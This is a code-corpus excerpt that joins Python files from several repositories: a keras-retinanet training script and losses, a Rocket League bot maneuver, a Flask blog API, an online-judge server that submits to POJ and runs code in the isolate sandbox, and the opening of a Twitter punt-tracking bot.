backbone_retinanet=backbone.retinanet,
num_classes=train_generator.num_classes(),
weights=weights,
multi_gpu=args.multi_gpu,
freeze_backbone=args.freeze_backbone,
lr=args.lr,
config=args.config
)
# print model summary
print(model.summary())
# this lets the generator compute backbone layer shapes using the actual backbone model
if 'vgg' in args.backbone or 'densenet' in args.backbone:
train_generator.compute_shapes = make_shapes_callback(model)
if validation_generator:
validation_generator.compute_shapes = train_generator.compute_shapes
# create the callbacks
callbacks = create_callbacks(
model,
training_model,
prediction_model,
validation_generator,
args,
)
# Use multiprocessing if workers > 0
if args.workers > 0:
use_multiprocessing = True
else:
use_multiprocessing = False
# start training
training_model.fit_generator(
generator=train_generator,
steps_per_epoch=args.steps,
epochs=args.epochs,
verbose=1,
callbacks=callbacks,
workers=args.workers,
use_multiprocessing=False,
max_queue_size=args.max_queue_size
)
if __name__ == '__main__':
main()
```
#### File: keras-retinanet/keras_retinanet/losses_fc.py
```python
import keras
from . import backend
def focal(alpha=0.25, gamma=2.0):
""" Create a functor for computing the focal loss.
Args
alpha: Scale the focal weight with alpha.
gamma: Take the power of the focal weight with gamma.
Returns
A functor that computes the focal loss using the alpha and gamma.
"""
def _focal(y_true, y_pred):
""" Compute the focal loss given the target tensor and the predicted tensor.
As defined in https://arxiv.org/abs/1708.02002
Args
y_true: Tensor of target data from the generator with shape (B, N, num_classes).
y_pred: Tensor of predicted data from the network with shape (B, N, num_classes).
Returns
The focal loss of y_pred w.r.t. y_true.
"""
labels = y_true[:, :, :-1]
anchor_state = y_true[:, :, -1] # -1 for ignore, 0 for background, 1 for object
classification = y_pred
# filter out "ignore" anchors
indices = backend.where(keras.backend.not_equal(anchor_state, -1))
labels = backend.gather_nd(labels, indices)
classification = backend.gather_nd(classification, indices)
# compute the focal loss
alpha_factor = keras.backend.ones_like(labels) * alpha
alpha_factor = backend.where(keras.backend.equal(labels, 1), alpha_factor, 1 - alpha_factor)
focal_weight = backend.where(keras.backend.equal(labels, 1), 1 - classification, classification)
focal_weight = alpha_factor * focal_weight ** gamma
cls_loss = focal_weight * keras.backend.binary_crossentropy(labels, classification)
# compute the normalizer: the number of positive anchors
normalizer = backend.where(keras.backend.equal(anchor_state, 1))
normalizer = keras.backend.cast(keras.backend.shape(normalizer)[0], keras.backend.floatx())
normalizer = keras.backend.maximum(keras.backend.cast_to_floatx(1.0), normalizer)
return keras.backend.sum(cls_loss) / normalizer
return _focal
def smooth_l1(sigma=3.0):
""" Create a smooth L1 loss functor.
Args
sigma: This argument defines the point where the loss changes from L2 to L1.
Returns
A functor for computing the smooth L1 loss given target data and predicted data.
"""
sigma_squared = sigma ** 2
def _smooth_l1(y_true, y_pred):
""" Compute the smooth L1 loss of y_pred w.r.t. y_true.
Args
y_true: Tensor from the generator of shape (B, N, 5). The last value for each box is the state of the anchor (ignore, negative, positive).
y_pred: Tensor from the network of shape (B, N, 4).
Returns
The smooth L1 loss of y_pred w.r.t. y_true.
"""
# separate target and state
regression = y_pred
regression_target = y_true[:, :, :-1]
anchor_state = y_true[:, :, -1]
# filter out "ignore" anchors
indices = backend.where(keras.backend.equal(anchor_state, 1))
regression = backend.gather_nd(regression, indices)
regression_target = backend.gather_nd(regression_target, indices)
# compute smooth L1 loss
# f(x) = 0.5 * (sigma * x)^2 if |x| < 1 / sigma / sigma
# |x| - 0.5 / sigma / sigma otherwise
regression_diff = regression - regression_target
regression_diff = keras.backend.abs(regression_diff)
regression_loss = backend.where(
keras.backend.less(regression_diff, 1.0 / sigma_squared),
0.5 * sigma_squared * keras.backend.pow(regression_diff, 2),
regression_diff - 0.5 / sigma_squared
)
# compute the normalizer: the number of positive anchors
normalizer = keras.backend.maximum(1, keras.backend.shape(indices)[0])
normalizer = keras.backend.cast(normalizer, dtype=keras.backend.floatx())
return keras.backend.sum(regression_loss) / normalizer
return _smooth_l1
def choose()
def _choose(y_true, y_pred):
``` |
{
"source": "joey676/RLBotPack",
"score": 3
} |
#### File: source/maneuvers/shadow_defense.py
```python
from maneuvers.kit import *
from maneuvers.driving.travel import Travel
from maneuvers.driving.stop import Stop
from maneuvers.driving.drive import Drive
class ShadowDefense(Maneuver):
def __init__(self, car: Car, info: GameInfo, face_target: vec3, distance_from_target: float):
super().__init__(car)
self.info = info
self.face_target = face_target
ball = info.ball
dist = min(distance_from_target, ground_distance(face_target, self.info.my_goal.center) - 50)
target_pos = ground(face_target) + ground_direction(face_target, self.info.my_goal.center) * dist
side_shift = distance_from_target / 4 if ground_distance(car, info.my_goal.center) > 2500 else 400
points = [target_pos + vec3(side_shift, 0, 0), target_pos - vec3(side_shift, 0, 0)]
target_pos = nearest_point(car.pos, points)
self.target = Arena.clamp(target_pos, 700)
self.travel = Travel(car, self.target)
self.drive = Drive(car)
self.start_time = car.time
self.wait = Stop(car)
def step(self, dt):
ball = self.info.ball
if (
distance(self.car, ball) < 1000
and align(self.car.pos, ball, self.info.my_goal.center) > 0.2
):
shift = normalize(cross(direction(ball, self.car), vec3(0, 0, 1))) * 1000
self.travel.target = nearest_point(self.car.pos, [ball.pos + shift, ball.pos - shift])
else:
self.travel.target = self.target
self.travel.step(dt)
self.controls = self.travel.controls
if self.travel.finished:
if angle_to(self.car, self.face_target) > 0.3:
self.drive.target_pos = self.face_target
self.drive.step(dt)
self.drive.target_speed = 700
self.drive.controls.handbrake = False
self.controls = self.drive.controls
else:
self.wait.step(dt)
self.controls = self.wait.controls
self.finished = self.travel._driving and self.car.time > self.start_time + 0.5
def render(self, draw: DrawingTool):
self.travel.render(draw)
``` |
{
"source": "joeyabouharb/flask-blogger",
"score": 3
} |
#### File: server/blueprints/index.py
```python
from flask import Blueprint, request, jsonify
from flask_jwt_extended import create_access_token
from server.models import DB
from server.models.User import User
from bcrypt import checkpw, hashpw, gensalt
INDEX_BLUEPRINT = Blueprint('Index', __name__, url_prefix='/api/v1')
@INDEX_BLUEPRINT.route('/register', methods=['POST'])
def register_user():
email = request.json['email']
is_already_registered = User.query.filter_by(email=email).first()
if is_already_registered:
return jsonify(message='This author already registered.'), 409
else:
name = request.json['name']
password = request.json['password'].encode('<PASSWORD>')
password = hashpw(password, g<PASSWORD>())
user = User(name=name, email=email, password=password)
DB.session.add(user)
DB.session.commit()
return jsonify(message='New author added to the blog!'), 201
@INDEX_BLUEPRINT.route('/login', methods=['POST'])
def login():
"""Login can accept JSON credentials
Returns:
JSON (access_token, message)
"""
if request.is_json:
email = request.json['email']
password = request.json['password']
else:
email = request.form['email']
password = request.form['password']
hash_password = User.query.filter_by(email=email).first().password
is_verified_user = checkpw(password.encode('utf-8'), hash_password)
if is_verified_user:
access_token = create_access_token(identity=email)
return jsonify(message="Successful login", access_token=access_token)
else:
return jsonify(message="Can't be verified at this time"), 401
```
#### File: server/blueprints/posts.py
```python
from math import ceil
from flask import Blueprint, jsonify, request
from flask_jwt_extended import jwt_required
from server.models import DB
from server.models.Post import Post, posts_schema, post_schema
POSTS_BLUEPRINT = Blueprint('Posts', __name__, url_prefix='/api/v1/posts')
@POSTS_BLUEPRINT.route('/', methods=['GET'])
def display_blog_posts():
page = int(request.args.get('page', '1'))
start = (page - 1) * 6
end = page * 6
blog = Post.query.all()
result = posts_schema.dump(blog)
pages = ceil(len(result) / 6)
print(pages)
page = result[start:end]
return jsonify(
{
"result": page,
"pageNo": pages
}
)
@POSTS_BLUEPRINT.route('/<int:post_id>', methods=['GET'])
def display_single_post(post_id: int):
post = Post.query.filter_by(post_id=post_id).first()
if post:
result = post_schema.dump(post)
return jsonify(result)
else:
return jsonify(message="Post does not exist"), 404
@POSTS_BLUEPRINT.route('/', methods=['POST'])
@jwt_required
def make_new_blog_post():
"""Accepts form data and creates new database record in blog-post table
Use Bearer Token in the Postman Authorization tab, take the
access token returned from '/login' route and inject.
JWT is currently broken after ROUTE changes---------fix later
Requires:
JWT authorization
"""
content = request.json.get('content', '').replace('\n', '')
if not content:
return jsonify(message="no content created"), 400
new_post = Post(content=content)
DB.session.add(new_post)
DB.session.commit()
return jsonify(message="New blog post created"), 201
@POSTS_BLUEPRINT.route('/', methods=['PUT'])
def update_post():
post_id = int(request.json['post_id'])
post = Post.query.filter_by(post_id=post_id).first()
if post:
post.title = request.json['title']
post.content = request.json['content']
DB.session.commit()
return jsonify(message="Post updated!"), 202
else:
return jsonify(message="No post with that ID"), 404
@POSTS_BLUEPRINT.route('/<int:post_id>', methods=['DELETE'])
def delete_post(post_id: int):
"""Delete the record from database posts table
Just enter the blog-post number into Postman with a DELETE request:
./delete-post/66
Arguments:
post_id: int: takes the argument from the URL
Returns:
message and status code in JSON
"""
post = Post.query.filter_by(post_id=post_id).first()
if post:
DB.session.delete(post)
DB.session.commit()
return jsonify(message="You obliterated that post"), 202
else:
return jsonify(message="No post by that ID"), 404
```
#### File: flask-blogger/server/__init__.py
```python
from flask import Flask
from flask_cors import CORS
from os import path
from dotenv import find_dotenv, load_dotenv
from server.blueprints.index import INDEX_BLUEPRINT
from server.blueprints.posts import POSTS_BLUEPRINT
from server.models import DB, MA, JWT
def create_app():
"""
:return:
"""
load_dotenv(find_dotenv())
app = Flask(__name__)
CORS(app, resources={r"/api/*": {"origins": "*"}})
basedir = path.abspath(path.dirname(__file__))
try:
app.config.from_envvar('CONFIG')
except RuntimeError:
raise RuntimeError('NO Environment configured. Closing.')
DB.init_app(app)
JWT.init_app(app)
MA.init_app(app)
app.register_blueprint(INDEX_BLUEPRINT)
app.register_blueprint(POSTS_BLUEPRINT)
return app
``` |
{
"source": "joeyac/JudgeServer",
"score": 2
} |
#### File: JudgeServer/server/oj_poj.py
```python
from utils import logger
from update_status import update_submission_status
from exception import VSubmitFailed, VLoginFailed
from bs4 import BeautifulSoup
import html5lib
import urllib, urllib2, cookielib
import time
class POJ:
# base information:
URL_HOME = 'http://poj.org/'
URL_LOGIN = URL_HOME + 'login?'
URL_SUBMIT = URL_HOME + 'submit?'
URL_STATUS = URL_HOME + 'status?'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/52.0.2743.116 Chrome/52.0.2743.116 Safari/537.36',
'Origin': "http://poj.org",
'Host': "poj.org",
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive',
}
# result
INFO = ['Run ID', 'User', 'Problem', 'Result', 'Memory', 'Time', 'Language', 'Code Length', 'Submit Time']
# map to compatible result
# vid v_run_id v_submit_time status time memory length language v_user
MAP = {
'Run ID': 'v_run_id',
'Submit Time': 'v_submit_time',
'Result': 'status',
'Problem': 'vid',
'Time': 'time',
'Memory': 'memory',
'Code Length': 'length',
'Language': 'language',
'User': 'v_user',
}
# language
LANGUAGE = {
'G++': '0',
'GCC': '1',
'JAVA': '2',
'PASCAL': '3',
'C++': '4',
'C': '5',
'FORTRAN': '6',
}
def __init__(self, user_id, password):
self.user_id = user_id
self.password = password
self.problem_id = ''
self.run_id = ''
# 声明一个CookieJar对象实例来保存cookie
cookie = cookielib.CookieJar()
# 利用urllib2库的HTTPCookieProcessor对象来创建cookie处理器
handler = urllib2.HTTPCookieProcessor(cookie)
# 通过handler来构建opener
self.opener = urllib2.build_opener(handler)
# 此处的open方法同urllib2的urlopen方法,也可以传入request
def login(self):
try:
data = dict(
user_id1=self.user_id,
password1=<PASSWORD>,
B1='login',
url='.',
)
post_data = urllib.urlencode(data)
request = urllib2.Request(POJ.URL_LOGIN, post_data, POJ.headers)
response = self.opener.open(request, timeout=5).read()
if response.find('loginlog') > 0:
return True
else:
logger.info("login failed.")
return False
except Exception as e:
logger.error(e)
return False
def submit(self, problem_id, language, src_code):
try:
self.problem_id = problem_id
submit_data = dict(
problem_id=problem_id,
language=POJ.LANGUAGE[language.upper()],
source=src_code,
submit='Submit',
encoded='0',
)
self.problem_id = problem_id
post_data = urllib.urlencode(submit_data)
request = urllib2.Request(POJ.URL_SUBMIT, post_data, POJ.headers)
page = self.opener.open(request, timeout=5)
html = page.read()
if 'Error Occurred' in html:
return False
return True
except Exception as e:
logger.error(e)
return False
@staticmethod
def str2int(string):
if not string:
return 0
try:
return int(string[:-1])
except:
return int(string[:-2])
def result(self):
try:
url_data = {
'user_id': self.user_id,
'problem_id': self.problem_id
}
url = POJ.URL_STATUS + urllib.urlencode(url_data)
page = self.opener.open(url, timeout=5)
# sometimes you can not get the page
if not page:
return False, {}
soup = BeautifulSoup(page, 'html5lib')
table = soup.find('table', {'class': 'a'})
if not table:
return False, {}
table_body = table.find('tbody')
rows = table_body.find_all('tr')
data = []
for row in rows:
cols = row.find_all('td')
cols = [ele.text.strip() for ele in cols]
data.append([ele for ele in cols]) # ! Get rid of empty values
if len(data) <= 1:
logger.warning('get result error!')
return False, {}
name = data[0]
latest = data[1]
if not self.run_id:
self.run_id = latest[0]
wait = ['running & judging','compiling','waiting']
res = {}
for i in range(9):
res[POJ.MAP[name[i]]] = str(latest[i]).lower()
res['time'] = self.str2int(res['time'])
res['memory'] = self.str2int(res['memory'])
for i in range(3):
if res['status'] == wait[i]:
return False, res
return True, res
except Exception as e:
logger.error(e)
return False, {}
def poj_submit(problem_id, language_name, src_code, ip=None, sid=None, username='USTBVJ', password='<PASSWORD>'):
poj = POJ(username, password)
if poj.login():
if poj.submit(problem_id, language_name, src_code):
status, result = poj.result()
while not status:
status, result = poj.result()
if result and ip:
update_submission_status(ip, sid, result['status'])
time.sleep(2)
return result
else:
info = 'POJ [{pid},{lang},{sid}] submit error.'.format(pid=problem_id, lang=language_name, sid=sid)
logger.exception(info)
raise VSubmitFailed(info)
else:
info = 'POJ [{user},{sid}] login failed.'.format(user=username, sid=sid)
logger.exception(info)
raise VLoginFailed(info)
if __name__ == '__main__':
pid = 1000
lang = 'g++'
src = '''
#include<iostream>
using namespace std;
int main()
{
int a,b;
while(cin>>a>>b)cout<<a-b<<endl;
return 0;
}
'''
print poj_submit(pid, lang, src)
```
#### File: JudgeServer/server/_runner.py
```python
from __future__ import unicode_literals
from config import JUDGE_DEFAULT_PATH, TEST_CASE_DIR, TEST_CASE_IN_DIR_NAME
from utils import get_meta_info
import os
import commands
# isolate -p --cg-mem 256000 --cg -i input.data --run -- /usr/lib/jvm/java-9-oracle/bin/java -cp exe Main
# isolate -M meta.data -m 262144 -t 1 -w 3 -x 1 -b 1 -k 262144 -o output.data -r error.data -v --run -- ./Main
# isolate --cg --run /usr/bin/python3 a.py
# isolate --cg [mem_limit,kb] [time_limit,s,fractions allowed] [wall_time_limit,s,fractions allowed]
# [extra_time] [box_id]
# [output_limit,kb] [process_limit] [in,out,error] --run -- [run_args] [exe_file]
# 标准:
# 返回一个字典 {'status':status_code_defined,
# 'info':detail}
# detail:{'time': 0.000, (in seconds)
# 'time-wall': 0.035, (in seconds)
# 'max-rss': 1336, (in kilobytes)
# 'csw-voluntary': 3,
# 'csw-forced': 2,
# 'exitcode': 1 (optional)
# 'error': {string}
# }
class Runner(object):
RESULT = {
"success": 0,
"runtime_error": 1,
"time_limit_exceeded": 2,
"memory_limit_exceeded": 3,
"output_limit_exceeded": 4,
"system_error": 8,
"unknown_error": 8,
}
def __init__(self, max_cpu_time, max_real_time, max_memory, box_id,
max_output_size, max_process_number,
input_file, output_file, error_file, meta_file,
run_args,
input_file_dir=TEST_CASE_DIR,
group_memory=False
):
self.judge_dir = os.path.join(JUDGE_DEFAULT_PATH, box_id, 'box')
self.max_cpu_time = max_cpu_time
self.max_real_time = max_real_time
self.max_memory = max_memory * 3
self.box_id = box_id
self.max_output_size = max_output_size * 2
self.max_process_number = max_process_number
self.input_file = input_file
self.output_file = output_file
self.error_file = error_file
self.meta_file = meta_file
self.run_args = run_args
self.group_memory = group_memory
self.input_file_dir = input_file_dir
self.cmd_status = None
self.cmd_result = None
self.result = None
def get_result(self):
# meta file base:
# time:0.000
# time-wall:0.035
# max-rss:1336
# csw-voluntary:3
# csw-forced:2
result = {}
error = ''
error_file_path = os.path.join(JUDGE_DEFAULT_PATH, self.box_id, 'box', self.error_file)
if os.path.exists(error_file_path):
with open(error_file_path) as f:
error = f.read().strip()
if self.cmd_status == 0 or 256:
meta = get_meta_info(self.meta_file)
result['info'] = meta
result['info']['error'] = error
if 'exitcode' not in result['info']:
result['info']['exitcode'] = 0
output_file = os.path.join(JUDGE_DEFAULT_PATH, self.output_file)
output_file_size = None
if os.path.exists(output_file):
output_file_size = float(os.path.getsize(output_file)) / 1024 # KB
if output_file_size and output_file_size > self.max_output_size / 2:
result['status'] = Runner.RESULT['output_limit_exceeded']
if 'OK' in self.cmd_result:
if meta['max-rss'] > self.max_memory / 3:
result['status'] = Runner.RESULT['memory_limit_exceeded']
else:
result['status'] = Runner.RESULT['success']
else:
if meta['status'] == 'TO':
result['status'] = Runner.RESULT['time_limit_exceeded']
elif meta['status'] == 'SG':
result['status'] = Runner.RESULT['runtime_error']
elif meta['status'] == 'RE':
result['status'] = Runner.RESULT['runtime_error']
else: # meta[‘status’] == 'XX' — internal error of the sandbox
result['status'] = Runner.RESULT['system_error']
else:
result['status'] = Runner.RESULT['unknown_error']
result['info']['error'] = error
self.result = result
def run(self):
# Enable use of control groups.
cmd = 'isolate --cg'
# special sandbox id for used in parallel
cmd += ' -b ' + str(self.box_id)
# bind input data dir
cmd += ' --dir=' + TEST_CASE_IN_DIR_NAME + '=' + str(self.input_file_dir)
# Inherit all environment variables from the parent.
cmd += ' -e'
# memory limit like this because of JVM will create a process
if self.group_memory:
cmd += ' --cg-mem ' + str(self.max_memory) # total memory limit
else:
cmd += ' -m ' + str(self.max_memory) # every process memory limit
cmd += ' -t ' + str(self.max_cpu_time)
cmd += ' -w ' + str(self.max_real_time)
# set extra time to report real execution time
cmd += ' -x ' + str(1)
if self.input_file:
cmd += ' -i ' + os.path.join('/' + TEST_CASE_IN_DIR_NAME, self.input_file).encode("utf-8")
cmd += ' -o ' + str(self.output_file)
cmd += ' -r ' + str(self.error_file)
cmd += ' -M ' + os.path.join(self.judge_dir, str(self.meta_file)).encode("utf-8")
# cmd += ' -f ' + str(self.max_output_size)
# Permit the program to create up to max processes and/or threads.
cmd += ' -p'
if self.max_process_number and self.max_process_number >= 1:
cmd += '=' + str(self.max_process_number)
cmd += ' --run -- '
run_args = str(self.run_args)
cmd += str(run_args)
status, result = commands.getstatusoutput(cmd)
self.cmd_status = status
self.cmd_result = result
self.get_result()
# return status, result
# print status
# print result
# return status
# return time memory
```
#### File: JudgeServer/server/test.py
```python
import os
import hashlib
import json
import sys
sys.path.append("..")
# s=os.path.join('test')
# print s
# print os.getcwd()
from client.languages import cpp_lang_config, c_lang_config, java_lang_config
from config import BASE_PATH, JUDGE_DEFAULT_PATH, TEST_CASE_DIR
from exception import JudgeServerError
import commands
def interpret(val):
try:
return int(val)
except ValueError:
try:
return float(val)
except ValueError:
return val
def TT():
def get_file_info():
try:
result = {}
with open(os.path.join(BASE_PATH, "meta.data")) as f:
for line in f:
name, var = line.partition(':')[::2]
result[name.strip()] = interpret(var.strip())
return result
except IOError:
raise JudgeServerError("Test case not found")
except ValueError:
raise JudgeServerError("Bad test case config")
x = get_file_info()
if x['csw-forced']==45:
print 'fuck u'
for a, b in x.iteritems():
print a+"___"+str(b)
def get_hash():
x = 'a+b problem'
token = hashlib.sha256(x).hexdigest()
# 9386c61e9a8001efa9fc4f875410419fa42f4eff9c13c3ed81382514518ce157
print token
def test():
from compiler import Compiler
box_id = 0
src_name = 'a.c'
src_path = src_name # except meta file other are all relative path
com = Compiler(cpp_lang_config['compile'], str(box_id))
print com.compile
# isolate --cg -b 0 -e -r errorc.data --cg-mem 300000 -M meta.out --processes --run -- /usr/bin/g++ -O2 -w -std=c++11 a.cpp -lm -o a.o
# isolate --cg -b 0 -e --dir=data/=/home/rhyme/code/USTBJudgeServer/JudgeServer/server/test_case/a
# -i data/1.in -o out.out -r error.out -m 10240 -M meta.out --processes --run -- a.o
# TT()
# print ''
# test()
#
def _load_test_case_info():
try:
with open(os.path.join(TEST_CASE_DIR, 'a', "info")) as f:
return json.loads(f.read())
except IOError:
raise JudgeServerError("Test case not found")
except ValueError:
raise JudgeServerError("Bad test case config")
x = _load_test_case_info()
# count = x['count']
# for i in range(1,count+1):
# print x[str(i)]
for test_case_file_id, _ in x.iteritems():
print test_case_file_id
print _
print 'down'
def dev_test():
cmd1 = 'g++ /var/local/lib/isolate/3/box/a.cpp -w -std=c++11 -lm -o /var/local/lib/isolate/3/box/a.o'
cmd2 = 'isolate -b 3 --cg -p -t 3 -m 30240 -f 1 ' \
'-M run.meta -r run.error -i data.in -o run.out -v -v -v --run -- ./a.o'
cmd3 = 'isolate -b 3 -t 3 -m 40240 -f 1 ' \
'-M run.meta -r run.error -i data.in -o run.out -v -v -v --run -- ./a.o'
(status, result) = commands.getstatusoutput(cmd1)
print status, result
x = raw_input('press enter to continue...')
(status, result) = commands.getstatusoutput(cmd2)
print status, result
x = raw_input('press enter to continue...')
(status, result) = commands.getstatusoutput(cmd3)
print status, result
x = raw_input('press enter to continue...')
def rm_box():
cmd = 'isolate -b {box_id} --cleanup'
for id in range(1,27):
run = cmd.format(box_id=id)
status, result = commands.getstatusoutput(cmd)
print result, id
# _load_test_case_info()
rm_box()
```
#### File: JudgeServer/server/update_status.py
```python
from utils import web_server_token, logger
import psutil
from threading import Thread
import Queue
import requests
class StatusWorker(Thread):
def __init__(self, queue):
self.queue = queue
super(StatusWorker, self).__init__()
def run(self):
while True:
address, sid, status = self.queue.get()
url = 'http://{adr}/api/submission/update/'.format(adr=address)
headers = {"Content-Type": "application/json"}
data = {
'token': <PASSWORD>,
'result': status,
'submission_id': sid,
}
try:
info = requests.post(url, headers=headers, json=data, timeout=2).json()
logger.info(str(info))
except Exception as e:
logger.exception(e)
finally:
self.queue.task_done()
cpu_count = psutil.cpu_count()
que = Queue.Queue()
for cnt in range(cpu_count):
worker = StatusWorker(que)
worker.daemon = True
worker.start()
logger.info('init update status env.')
def update_submission_status(address, sid, status):
# print address, sid, status
que.put([address, sid, status])
```
#### File: JudgeServer/server/utils.py
```python
from __future__ import unicode_literals, with_statement
import commands
import hashlib
import logging
import os
import shutil
import signal
import socket
from contextlib import contextmanager
from logging.handlers import RotatingFileHandler
import psutil
from config import REMOTE_DEBUG
from config import TOKEN_FILE_PATH, JUDGE_DEFAULT_PATH, DEBUG
from exception import SandboxError,JudgeServerError
logFile='/log/judge.log'
my_handler = RotatingFileHandler(logFile, mode='a', maxBytes=5*1024*1024,
backupCount=2, encoding=None, delay=0)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s [%(threadName)s:%(thread)d] [%(name)s:%(lineno)d]'
' [%(module)s:%(funcName)s] [%(levelname)s]- %(message)s',
datefmt='%m-%d %H:%M',
filename='/log/judge.log',
filemode='w',
)
logging.getLogger('').addHandler(my_handler)
if REMOTE_DEBUG:
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)s: %(asctime)s [%(module)s:%(funcName)s] [%(levelname)s]- %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
# Now, we can log to the root logger, or any other logger. First the root...
logger = logging
# http://stackoverflow.com/questions/366682/how-to-limit-execution-time-of-a-function-call-in-python
class TimeoutException(Exception):
pass
@contextmanager
def time_limit(seconds):
def signal_handler(signum, frame):
raise TimeoutException, "Timed out!"
signal.signal(signal.SIGALRM, signal_handler)
signal.alarm(seconds)
try:
yield
finally:
signal.alarm(0)
def server_info():
cmd = 'isolate --version'
(exit_status, out_text) = commands.getstatusoutput(cmd)
if exit_status != 0:
raise SandboxError("isolate(https://github.com/ioi/isolate) not found or error")
return {"hostname": socket.gethostname(),
"cpu": psutil.cpu_percent(),
"cpu_core": psutil.cpu_count(),
"memory": psutil.virtual_memory().percent,
"judger_version": out_text,
}
def get_token():
try:
with open(TOKEN_FILE_PATH, "r") as f:
return f.read().strip()
except IOError:
raise JudgeServerError("token.txt not found")
def interpret(val):
try:
return int(val)
except ValueError:
try:
return float(val)
except ValueError:
return val
def get_meta_info(file_path):
try:
result = {}
with open(file_path) as f:
for line in f:
name, var = line.partition(':')[::2]
result[name.strip()] = interpret(var.strip())
return result
except IOError:
raise JudgeServerError("meta file not found")
except ValueError:
raise JudgeServerError("Bad meta file config")
def replace_blank(string):
return string.replace('\t', '').replace('\n', '').replace(' ', '')
def choose_box_id():
for box_id in range(100):
path = os.path.join(JUDGE_DEFAULT_PATH, str(box_id))
if not os.path.exists(path):
return str(box_id)
return None
class InitIsolateEnv(object):
def __init__(self):
self.box_id = choose_box_id()
def __enter__(self):
if not self.box_id:
raise JudgeServerError("failed to get box id")
try:
cmd = 'isolate -b {box_id} --cg --init'
cmd = cmd.format(box_id=self.box_id)
status, result = commands.getstatusoutput(cmd)
if DEBUG:
print cmd
if status != 0:
raise JudgeServerError("failed to create runtime dir")
except Exception as e:
logger.exception(e)
raise JudgeServerError("failed to create runtime dir")
return self.box_id
def __exit__(self, exc_type, exc_val, exc_tb):
try:
cmd = 'isolate -b {box_id} --cleanup'
cmd = cmd.format(box_id=self.box_id)
status, result = commands.getstatusoutput(cmd)
path = os.path.join(JUDGE_DEFAULT_PATH, self.box_id) # prevent for unclean
if os.path.exists(path):
shutil.rmtree(path)
if DEBUG:
print cmd, status
if os.path.exists(path):
raise JudgeServerError("failed to clean runtime dir")
except Exception as e:
logger.exception(e)
raise JudgeServerError("failed to clean runtime dir")
def get_dir_hash(directory):
import checksumdir
if os.path.exists(directory):
return checksumdir.dirhash(directory, 'sha256')
else:
return -1
token = hashlib.sha256(get_token()).hexdigest()
web_server_token = '<PASSWORD>'
if __name__ == '__main__':
# while True:
# logger.info('data')
print get_dir_hash(os.path.join(os.getcwd(), 'test_case', 'a'))
``` |
{
"source": "joeyagreco/Surrender-Index",
"score": 3
} |
#### File: joeyagreco/Surrender-Index/surrender_index_bot.py
```python
import argparse
from base64 import urlsafe_b64encode
import chromedriver_autoinstaller
from datetime import datetime, timedelta, timezone
from dateutil import parser, tz
from email.mime.text import MIMEText
import espn_scraper as espn
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import json
import numpy as np
import os
import pickle
import scipy.stats as stats
from selenium import webdriver
from selenium.webdriver.support.select import Select
from selenium.common.exceptions import StaleElementReferenceException
from subprocess import Popen, PIPE
import sys
import threading
import time
import tweepy
from twilio.rest import Client
import traceback
# A dictionary of plays that have already been tweeted.
tweeted_plays = None
# A dictionary of the currently active games.
games = {}
# The authenticated Tweepy APIs.
api, ninety_api = None, None
# NPArray of historical surrender indices.
historical_surrender_indices = None
# Whether the bot should tweet out any punts
should_tweet = True
### SELENIUM FUNCTIONS ###
def get_game_driver(headless=True):
global debug
global not_headless
options = webdriver.ChromeOptions()
if headless and not debug and not not_headless:
options.add_argument("headless")
return webdriver.Chrome(options=options)
def get_twitter_driver(link, headless=False):
with open('credentials.json', 'r') as f:
credentials = json.load(f)
email = credentials['cancel_email']
username = credentials['cancel_username']
password = <PASSWORD>['cancel_password']
driver = get_game_driver(headless=headless)
driver.implicitly_wait(60)
driver.get(link)
driver.find_element_by_xpath("//div[@aria-label='Reply']").click()
time.sleep(1)
login_button = driver.find_element_by_xpath("//a[@data-testid='login']")
time.sleep(1)
driver.execute_script("arguments[0].click();", login_button)
email_field = driver.find_element_by_xpath(
"//input[@name='session[username_or_email]']")
password_field = driver.find_element_by_xpath(
"//input[@name='session[password]']")
email_field.send_keys(email)
password_field.send_keys(password)
driver.find_element_by_xpath(
"//div[@data-testid='LoginForm_Login_Button']").click()
time.sleep(1)
if 'email_disabled=true' in driver.current_url:
username_field = driver.find_element_by_xpath(
"//input[@name='session[username_or_email]']")
password_field = driver.find_element_by_xpath(
"//input[@name='session[password]']")
username_field.send_keys(username)
password_field.send_keys(password)
driver.find_element_by_xpath(
"//div[@data-testid='LoginForm_Login_Button']").click()
return driver
def get_inner_html_of_element(element):
return element.get_attribute("innerHTML")
def get_inner_html_of_elements(elements):
return list(map(get_inner_html_of_element, elements))
def construct_play_from_element(element):
title = get_inner_html_of_element(element.find_element_by_tag_name("h3"))
desc = get_inner_html_of_element(
element.find_element_by_tag_name("p").find_element_by_tag_name("span"))
desc = desc.lstrip().rstrip()
play = {}
if len(title) > 5:
down_dist, yrdln = title.split("at")
play['yard_line'] = yrdln.lstrip(" ")
play['down'] = down_dist[:3]
play['dist'] = down_dist.rstrip(" ").split(" ")[-1]
if 'goal' in play['dist'].lower():
play['dist'] = play['yard_line'].split(" ")[1]
start_index = desc.find("(") + 1
end_index = desc.find(")")
time_qtr = desc[start_index:end_index]
play['time'] = time_qtr.split("-")[0].rstrip(" ")
play['qtr'] = time_qtr.split("-")[1].lstrip(" ")
play['text'] = desc[end_index + 1:].lstrip(" ")
return play
def get_plays_from_drive(drive, game):
all_plays = drive.find_elements_by_tag_name("li")
good_plays = []
if is_final(game):
relevant_plays = all_plays[-3:]
else:
relevant_plays = all_plays[:3]
for play in relevant_plays:
if play.get_attribute("class") == '' or play.get_attribute(
"class") == 'video':
play_dct = construct_play_from_element(play)
if 'yard_line' in play_dct:
good_plays.append(play_dct)
return good_plays
def get_all_drives(game):
all_drives = game.find_elements_by_class_name("drive-list")
for drive in all_drives:
accordion_content = drive.find_element_by_xpath(
'..').find_element_by_xpath('..')
if "in" not in accordion_content.get_attribute("class"):
accordion_content.find_element_by_xpath('..').click()
time.sleep(0.5)
return all_drives
### POSSESSION DETERMINATION FUNCTIONS ###
def get_possessing_team_from_play_roster(play, game):
global punters
home, away = get_home_team(game), get_away_team(game)
home_punters, away_punters = punters[home], punters[away]
home_possession, away_possession = False, False
for home_punter in home_punters:
if home_punter in play['text']:
